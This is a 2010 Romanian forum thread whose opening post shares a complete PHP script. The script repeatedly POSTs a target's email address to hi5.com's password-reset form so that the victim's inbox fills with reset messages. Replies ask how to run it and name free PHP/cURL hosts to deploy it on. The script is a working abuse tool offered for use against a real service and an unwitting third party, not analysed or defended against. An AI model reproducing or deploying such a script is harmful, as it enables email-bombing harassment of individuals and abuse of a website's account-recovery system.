Vlachs Posted April 10, 2010 Report Posted April 10, 2010 MottoPentru stralucirea cocalareasca din tineMerge din consola folosire: script.php email numar_de_email-uri_sa_primeasca<?php// by benny_loppa [rowarez.org | insecurity.ro]set_time_limit(0);echo "\r\nhi5 Inbox Spammer\r\n";if($_SERVER['argv'][1]){for($i=0;$i<$_SERVER['argv'][2];$i++){do_request();}echo "finished spamming ".$_SERVER['argv'][1]."\r\n";}function do_request(){$a=curl_init();curl_setopt($a,CURLOPT_URL,"http://hi5.com/friend/requestPasswordReset.do");curl_setopt($a, CURLOPT_POST,TRUE);curl_setopt($a, CURLOPT_RETURNTRANSFER, TRUE);curl_setopt($a, CURLOPT_REFERER,"http://hi5.com/friend/requestPasswordReset.do");curl_setopt($a, CURLOPT_POSTFIELDS,"email=".$_SERVER['argv'][1]."&hidden=1");$b=curl_exec($a);curl_close($a);}?>Lets spam some coca Quote
SENEQ_o Posted April 10, 2010 Report Posted April 10, 2010 stiu ca e lame intrebarea da la ce te referi exact ?Merge din consola nu le am cu php , tb urcat script.php pe un host? ( daca da imi ziceti si mie unu bun si moca) ps: ms anticipat Quote
dragosmk Posted April 10, 2010 Report Posted April 10, 2010 pe un host care suporta cURL sau pe pcu tau daca ai instalat apache cu php si curl Quote
Paul4games Posted April 10, 2010 Report Posted April 10, 2010 Cred ca merge urcat pe x10hosting.com Quote
Moderators Dragos Posted April 10, 2010 Moderators Report Posted April 10, 2010 Free Web Hosting Area cel mai folosit Quote